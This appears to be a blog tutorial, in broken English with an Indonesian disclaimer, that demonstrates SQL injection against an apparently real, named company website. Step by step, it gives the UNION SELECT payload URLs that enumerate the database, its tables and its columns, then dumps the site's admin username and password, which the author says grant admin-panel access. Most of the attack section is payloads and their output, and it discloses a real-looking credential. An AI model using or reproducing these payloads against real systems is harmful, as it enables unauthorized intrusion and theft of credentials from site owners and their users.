SQL INJECTION is a code injection technique that exploit a security vulnerable occurring in database layer of an application like Queries. the vulnerability is present when user input either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly type and thereby unexpectedly executed. It happens from using poorly designed query language interpreters. In the wild, it has been noted that applications experience, on average.
so i will show you when vulnerability sql injection is present. I was found the vulnerability when I browse on a website that can be exploit with sql injection technique. the normally URL is http://victim.biz/?menuid=40, I tried to input character "( ' )" to get error from the application and the url like this http://victim.biz/?menuid='40 so the respond of the website was show a blank page. its mean that the target is vulnerable but I found the error message not yet.
I was found the error message on sources code of the website it was hidden on syntax <title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''40' at line 1</title> now perform the syntax sql to exploit the vulnerable.
first looking for columns of the database the syntax is http://victim.biz/?menuid=40+order+by+2-- if the number of columns was found, next syntax to find the column that vulnerable the syntax is http://sucofindo.biz/?menuid=-40 UNION SELECT 1,2--
and the result
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<title> SUCOFINDO || 1</title>
the column that vulnerable is column 1. now replace column 1 with sql syntax to find out version of the DBMS using " http://sucofindo.biz/?menuid=-40 UNION SELECT @@version(),2--"or "http://sucofindo.biz/?menuid=-40 UNION SELECT database(),2--" to find out the database of the DBMS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<title> SUCOFINDO || websci_2</title>
the database of the DBMS is websci_2. now find out tables on the database using syntax
http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(table_name),2 from information_schema.tables where table_schema=database()--
"<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<title> SUCOFINDO || cabang,head_slider,jasa,menu,press,propinsi,publikasi,publikasi_detil,publikasi_detil_event,sbu,solution_jasa,solution_jasa_sec,tentang_kami,user</title> "
to find out columns of table user i have to convert user to ASCII HEX and the result is 0x75736572 the syntax like this "http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(column_name),2 from information_schema.columns where table_name=0x75736572--"
the result like below
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<title> SUCOFINDO || id_user,user_id,nama,jenis_kelamin,tgl_lahir,password,tgl_create,tgl_update,aktif,id_otoritas,cabang_id,status,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_pr</title>
now dump id_user and password using syntax "http://sucofindo.biz/?menuid=-40 UNION SELECT group_concat(id_user,0x3a,password),2 from user--"
the result is
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<title> SUCOFINDO || admin:adminpa55</title>
I can login on to admin panel on this website with id_user and password that I found.....
note :
(jangan pernah menggunakan ilmu kamu untuk merusak, karna itu akan berakibat fatal bagi anda ini hanya tutorial yang saya tunjukkan betapa bahanya serangan sql ijection )
thanks....
welll...greats...
BalasHapus